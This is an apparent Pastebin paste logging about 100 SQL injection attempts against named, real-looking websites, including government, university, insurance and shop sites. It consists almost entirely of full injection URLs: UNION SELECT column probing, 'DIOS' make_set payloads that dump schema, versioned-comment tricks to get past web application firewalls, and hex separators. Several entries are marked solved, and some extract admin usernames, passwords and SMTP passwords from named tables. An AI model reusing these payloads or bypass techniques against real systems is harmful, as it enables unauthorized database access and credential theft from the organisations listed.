Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- problems
- 1.http://esjindex.org/search.php?id=-1'+#uNiOn+#sEleCt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -
- 2.https://mahara.org/group/view.php?id=1
- 3.https://www.jdcaravan.com/store.php?id=1 error e nai
- 3 site not vln
- 4.https://www.jbctools.com/cataleg.php?id=1
- 5.http://www.silverngrace.com/productlist.php?id=1
- 5 site not vln
- 6.http://www.microtek.com/products.php?KindID=6&ID=-1+UNION+ALL+SELECT+1,2,3,4,5,6,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -
- ##have username,password column but show error to find them
- 7.http://isr-tkd.com/index.php?cntr=e/news.php?id=1
- 7 php error not sql
- 8.https://www.bnl.gov/ps/beamlines/highlights.php?q=4-ID [error not fixed,.gov site]
- 8 site premanently moved
- 9.https://www.jewishgen.org/databases/cemetery/jowbrshow.php?ID=ISR-07022
- 10.http://www.rorschach.com/index.php?id=47
- 11.http://www.rorschach.com/index.php?id=47 [no error]
- 11. secure firawall
- 12.https://www.provision-isr.com/index.php?option=com_sppagebuilder&view=page&id=7&Itemid=302 [no error]
- 13.https://isr.umd.edu/news/news_story.php?id=6948 [no error]
- 14.http://www.inquiryinaction.org/classroomactivities/activity.php?id=2'+ORDER+BY+1-- - [order by gives error]
- 15.https://www.mnmindia.org/portfolio.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,6-- - [vulnerable column not found]
- 16.http://www.rockinmusic.net/album_list.php?id=-1'+UNION+ALL+SELECT+1,2-- - [DIOS creates error](column count error half fix...)
- 17.http://www.renickbell.net/doku.php?id=music
- 17 site not vln
- 19.http://www.rinkydinkelectronics.com/library.php?id=51'-- - [error not fixed]
- 20.https://www.bloody.com/en/download.php?id=6' [no errror]
- 20 site not vln this is so popular site for gamers maybe they hae bounty program
- 21.http://www.jncasr.ac.in/annview.php?id=838-- - [you are not authorised to view gthis site]
- 22.https://www.eia.gov/tools/faqs/faq.php?id=427'-- - [error not fixed]
- 22 same as 30 No.
- 23.https://www.pwaworldtour.com/index.php?id=2208' [no error]
- 23 site not vln
- 24.https://stockcharts.com/school/doku.php?id=chart_school:technical_indicators:relative_strength_index_rsi+ORDER+BY+500-- -
- 24 site not vln
- 25.https://kb.wisc.edu/helpdesk/page.php?id=12384-- - [error not fixed]
- 26.http://www.iea-pvps.org/index.php?id=6' [no error]
- 26 site not vln
- 27.https://www.baylor.edu/law/index.php?id=929875' [....]
- 27 site not vln
- 28.http://americanvalues.org/search/item.php?id=18' [page not found,how to fix]
- 28 site redirect and no redirect not working :(
- 29.https://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+UNION+ALL+SELECT+1,2,3,4,group_concat(table_name,'::',column_name),6,7,8,9 from information_schema.columns where table_schema=database()-- - [using anything as the separator of table,column creates error]
- ** convert in hex then use anything**
- 29 (solved) https://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+UNION+ALL+SELECT+1,2,3,4,group_concat(table_name,0x3d3e,column_name),6,7,8,9 from information_schema.columns where table_schema=database()-- -
- 30.https://www.eia.gov/todayinenergy/detail.php?id=34812-- -
- 30 not sure but its us gov site i don't think sqli
- 31.https://www.edison-bd.com/company_details.php?id=-7'+UNION+ALL+SELECT+1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7,8,9,10,11,12-- - [don't work without DIOS]
- 31 then use dios sometimes dios work like waff bypass
- 32.http://weppi.gtk.fi/publ/foregsatlas/article.php?id=7' [query failed]
- 32 (solved) http://weppi.gtk.fi/publ/foregsatlas/article.php?id=-7 +UNION+ALL+SELECT+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7 -- -
- 33.http://www.hausalpenrose.com/index.php?id=83 [error site,string fix the error of the site]
- 33 no redirect not work :(
- 34.https://www.stradeproject.eu/index.php?id=7-- - [error not fixed]
- 34 not vuln
- 35.https://www.hcidhaka.gov.in/pages?id=eyJpdiI6InJvYzZwVFNjemRHXC9BcktoVjFBaUVBPT0iLCJ2YWx1ZSI6InlOcmg0NGRSeWlPc1psZzVlYTNyK0E9PSIsIm1hYyI6ImM4ZTA3NGI1NDU4M2FmM2Q4YzY5MzZmYTBlZjU1MDE1ZTYxZTFhOGRhZjEzYTk3YWFjZmIyYTkxMmNkZmViMDkifQ== [so long parameter]
- 35 encoded in base 64
- 36.http://project-lovcen.me/page.php?id=6-- - [error not fixed]
- 37.https://mvss.in/gallery.php?id=-6+UNION+ALL+SELECT+@@database-- - [don't show database but show version()]
- **don't use + ***
- 37 (solved) https://mvss.in/gallery.php?id=-6 UNION ALL SELECT /*!12345database()*/ -- -
- 38.http://bdlaws.minlaw.gov.bd/print_sections_all.php?id=25 order by 1-- - [order by creates error]
- 38 secure firewall
- 39.https://www.99marriageguru.com/post.php?id=-19+UNION+ALL+SELECT+1,2,group_concat(table_name,column_name),4,5,6,7,8,9 from information_schema.columns where table_schema=database()-- - [table_name,column_name seperator and '<br>'creates error]
- ** use hex sometime br not work**
- 39 (solved) https://www.99marriageguru.com/post.php?id=-19+UNION+ALL+SELECT+1,2,group_concat(table_name,0x3c62723e,column_name),4,5,6,7,8,9 from information_schema.columns where table_schema=database()-- -
- 40.https://www.galileo.net.in/prod.php?id=-9+UNION+ALL+SELECT+1,2,3,4-- -
- 40 (solved) https://www.galileo.net.in/prod.php?id=-9 +/*!12345UNION*/+ALL+SELECT+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4 -- -
- 41.http://alexmonteith.com/works.php?category=film&name=Film/work_detail.php?id=77'-- - [....]
- 41 not vlnrbl
- 42.http://www.maxforlive.com/library/device.php?id=331-- - [not fixed]
- 42 not sql error maybe
- 43.http://www.oar-info.ru/index.php?id=138-- - [errox not fixed:too many forward attempts]
- 43 come on dude rashian site :p maybe security high
- 44.http://sociedadanonima.mx/Projects.php?Id=101-- - [error not fixed]
- 45.http://www.vgloop.com/group.php?id=-292+/*!50000UNION*/+ALL+SELECT+1-- -
- ***use no redirect***
- 45 (solved) http://www.vgloop.com/group.php?id=-292 +/*!12345UNION*/+ALL+SELECT+make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) -- -
- 46.http://asakusa-i.tokyo/e/shops/shop.php?id=-5+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16-- - [vulnerable column found but version(),database() gives error]
- 46 language japan :/
- 47.http://www.amarbooks.com/cat.php?cd=183-- - [403 forbidden]
- 47 peram load hocche na
- 48.http://www.amarbooks.com/download.php?id=18305 order by 1-- - [how many columns]
- 47 peram load hocche na
- 49.http://www.freebanglafont.com/download.php?id=752+ORDER+BY+100-- - [how many columns]
- 49 maybe not sql error check content when error
- 50.https://seu.edu.bd/dept/cse.php?id=vision-- - [error not fixed]
- 50 not sql error
- 51.https://www.nitolinsurance.com/news_details.php?id=-1'+UNION+ALL+SELECT+1,,3,4-- - [when put sername,password it gives error]
- 51 (solved) https://www.nitolinsurance.com/news_details.php?id=-1' +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+nitolins_website.admin) -- -
- 52.http://kyanc.edu.bd/employee-view.php?id=4
- ***parm 4 is not vlnrbl**
- 52 (solved) http://kyanc.edu.bd/page.php?id=-2' +UNION+ALL+SELECT+1,2,(/*!%53ELECT*/+/*!50000GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)*//**//*!%46ROM*//**//*!INFORMATION_SCHEMA.TABLES*//**//*!%57HERE*//**//*!TABLE_SCHEMA*//**/LIKE/**/DATABASE()),4,5,6 -- -
- 53.http://khpg.org/en/index.php?id=1551054011'-- -
- 54.http://www.pacbi.org/etemplate.php?id=1451'+ORDER+BY+100000-- - [no. of columns]
- 54 This website has moved but this site will still be visible as an arhive.
- 55.http://www.minddesign.co.uk/show.php?id=-174'+UNION+ALL+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema=database()-- - [illigal mix error]
- 56.https://www.ileswastesystems.co.uk/index.php?id=-1'+UNION+ALL+SELECT+1,2,3-- - [....]
- 57.http://www.josleys.com/article_show.php?id=82' [invalid input]
- 58.https://jobs.bdjobs.com/jobdetails.asp?id=838856-- -
- 58 MSSQL
- 59.http://www.bdjobstoday.com/jobsbycategory.php?cat=4' order by 1-- - [order by creates error]
- 60.https://jobs.bdjobs.com/m/jobsearch.aspx?fcatId=1-- - [error not fixed]
- 60 MSSQL
- 61.http://www.filmposter-archiv.de/filmplakat.php?id=29121-- -
- 61 page moved permanently
- 62.http://bdlaws.minlaw.gov.bd/bangla_pdf_part.php?id=1105+ORDER+BY+1-- - [order by creates error]
- 62 strong firewall
- 63.http://www.sneaindia.com/Admin_index.php?id=11 union select 1-- - [column no]
- 64.https://www.eduhelpindia.com/college.php?id=-1541' /*!50000union*/ select 1,2,3,group_concat(table_name,column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32from information_schema.columns where table_schema=database()-- - [group_concat creates error]
- 64 (solved) https://www.eduhelpindia.com/college.php?id=-1541' /*!50000union*/ select 1,2,3,/*!13337group_concat(table_name,'::',column_name)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 /*!12345from*/ /*!12345information_schema.columns*/ /*!50000where*/ /*!13337table_schema*/=/*!50000database()*/-- -
- 65.http://www.pbw-india.com/category.php?id=-1 /*!50000union*/ select 1,2,3,4,5,6,7,8-- - [don't show vulnerable column]
- 65 page permanently moved
- 66.https://www.hotelmetdelhi.com/pages.php?id=-84'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10-- - [don't show vulnerable column]
- 66 (solved) view-source:https://www.hotelmetdelhi.com/pages.php?id=78'+UNION+ALL+SELECT+1,2,3,group_concat(column_name),5,6,7,8,9,10 from information_schema.columns where table_name='yp_admin'-- -
- 67.http://www.channel-bd.net/channel.php?id=-207'+/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),14-- - [gives error to find password & user]
- 67 firewall maybe so strong
- 68.http://naasindia.org/detail.php?id=624 order by 1-- - [order by creates error]
- 69.http://www.pcs.org.ps/yZLN/pU2dL.php?id=258808+ORDER+BY+10-- -
- 69 site is ok
- 70.http://www.repetidordisc.com/ing/bandas.php?id=-15+UNION+ALL+SELECT+1,group_concat(table_name,'::',column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.columns where table_schema=database()-- - [use of seperator makes error]
- view-source:http://www.repetidordisc.com/ing/bandas.php?id=-15 UNION ALL SELECT 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -- -
- 71.https://kb.wisc.edu/page.php?id=81448-- -
- 72.https://www.h-net.org/jobs/job_display.php?id=58048-- -
- 73.http://www.ryans-muddy-boot.net/index.php?id=5--
- 73 page not found
- 74.http://bd-motor.com/page.php?action=pview&id=-563' /*!50000union*/ select 1,(SELECT+GROUP_CONCAT(smtppass+SEPARATOR+0x3c62723e)+FROM+bdmotor_bd.settings),3,4,5,6,7,8-- - [gives error in the last moment]
- 74 (Solved) http://bd-motor.com/page.php?action=pview&id=-563' /*!50000union*/ select 1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8-- -
- 75.http://www.gaysport.cz/index.php?id=-2 /**/UNION/**//*!50000SELECT*//**/ 1,2-- - [failed to bypass]
- 76.http://lola.land/projecten.php?id=-80+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- - [don't show vulnerable columns]
- 76 no redirect not working :(
- 77.https://www.rhinebeckcsd.org/pagecontent.php?id=-14 /*!50000union*/ select 1,2,3,4,,,7,8,9,10,11,12-- - [not showing vulnerable column]
- 78.http://www.greenhorizon.lk/selection.php?id=-19 /*!50000union*/ select 1-- - [500 server error not fixed]
- 79.https://survey.gov.lk/epy/single.php?id=-1'+UNION+ALL+SELECT+1-- - [vulnerable column not found]
- 80.http://surf-lanka.com/placeinfo.php?id=-1'+UNION+ALL+SELECT+1,group_concat(username,password),3,4,5,6,7,8,9,10 from dqsrt_surflanka-- - [don't show pass,uname]
- 80 load hocche na
- 81.http://www.jlbender.nl/indexvt.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151-- - [don't show vulnerable column]
- 82.https://www.wecaregreybruce.ca/ytopic.php?id=-5'+UNION+ALL+SELECT+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5-- - [403 forbidden]
- 82 (solved) https://www.wecaregreybruce.ca/ytopic.php?id=-5' UNION ALL SELECT 1,/*!12345group_concat(table_name,0x3c62723e)*/,3,4,5 /*!12345from*/ /*!13337information_schema.tables*/ /*!50000where*/ /*!12345table_schema*/=/*!13337database()*/ -- -
- 83.http://www.mwnuk.co.uk/resourcesDetail.php?id=-97+/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12-- -
- 83 page moved permanently
- 84.http://www.true-magic.com/view.php?id=1-- - [not fixed]
- 85.https://www.hotelmetdelhi.com/pages.php?id=-96'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10-- - [not showing vulnerable column]
- 85 (solved) view-source:https://www.hotelmetdelhi.com/pages.php?id=78'+UNION+ALL+SELECT+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8,9,10 -- -
- 86.http://www.thekhyber.co.uk/menu.php?id=-40'+UNION+ALL+SELECT+1,2,group_concat(id,pal),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from aquarious_core-- - [error]
- 86 (solved) http://www.thekhyber.co.uk/menu.php?id=-40' +UNION+ALL+SELECT+1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 -- -
- 87.http://www.ipicgroup.com/shopping_centre.php?id=-1+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+ipicgr_db1.users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- - [error in the last cmd]
- 88(solved) http://www.ipicgroup.com/shopping_centre.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),14,15,16,17 -- -
- 88.http://createmytravel.co.in/hotel-details.php?id=-6 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+Integrb2_createmytravel .tbl_admin),13-- -[cmd-error-not acceptable ]
- 88 site load hocche na
- 89.https://lcps-lebanon.org/featuredArticle.php?id=-137 /*!50000union*/ select 1,2,@@database,4,5,6,7,8,9-- - [inclusion of database gives error]
- 89 load hocche na
- 90.http://www.fidelity.com.lb/page.php?id=7-- - [error half fixed]
- 90 site load hocche na
- 91.http://www.aayanre.com/project-cat.php?id=1' /*!50000union+select*/ 1,2,3,4-- - [query failed]
- 92.http://www.ijqr.net/paper.php?id=-638' /*!50000union*/ select 1,2,3,4,5,6,7,8,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+ijqr_ijqr.openconf_reviewer),10,11,12,13,14,15-- -
- 92 (solved) http://www.ijqr.net/paper.php?id=-638' /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)-- -
- 93.http://agrofor.ues.rs.ba/paper.php?id=12-- - [error not fixed]
- 94.http://wondernexa.com/car.php?id=-1 /**/UNION/**//*!50000SELECT*//**/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- - [....]
- 95.http://www.antypas1.com/cars.php?id=3-- - [forbidden,no permission]
- 96.http://wondercars.net/get-email-car.php?id=-12 /*!50000union*/ select 1,2,3,4-- - different number of column
- 97.https://www.iautocars.com/sales/vehicle.php?id=-1' /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -
- 97 (solved) https://www.iautocars.com/sales/vehicle.php?id=-1' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),19,20,21,22,23,24,25,26,27,28,29,30,31 -- -
- 98.http://www.nrhz.de/flyer/beitrag.php?id=-24002'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- - [not showing vulnerable column]
- 98(solved) http://www.nrhz.de/flyer/beitrag.php?id=-24002' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -
- 99.http://www.alda-europe.eu/newSite/project_dett.php?ID=57-- - [access denied]
- 100.https://36igc.org/page.php?id=17'+ORDER+BY+1-- - [order by gives error]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement